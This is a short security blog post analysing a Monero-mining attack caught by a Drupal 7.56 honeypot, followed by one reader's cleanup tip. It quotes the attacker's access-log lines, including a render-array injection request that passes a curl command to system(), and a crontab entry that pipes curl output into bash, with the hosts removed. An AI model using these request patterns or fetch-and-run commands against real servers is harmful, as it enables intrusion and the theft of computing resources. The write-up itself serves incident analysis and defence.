Suppoie Crypto Hijack

Suppoie Crypto Hijack

We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a jpeg image, which turned out to be a script. The script connects to a Monero mining pool, and starts mining crypto from the server automatically. Vulnerability used is via Curl in this version of Drupal.

Here’s all of the traffic from the attacker: - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby" - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby" - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"


The file logo7.jpg pulled down from site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:

Created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json. The config.json file has embedded credentials to login to the mining pool under user



A crontab is created to keep the script going:

[email protected] /var/tmp # crontab -u www-data -l
* * * * * curl -s | bash -s


If you’re interested in doing analysis, I’ve added the code to download all of the files, password to the zip is infected.

Here’s an analysis courtesy of the JoeSandBox tool we often use to analyze Malware on this site.


One Reply to “Suppoie Crypto Hijack”

  1. We found the same here. In the /var/tmp directory look for a new directory called ‘…’ and owned by www-data; it contained miner data. Use rm -rf … to remove that directory.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.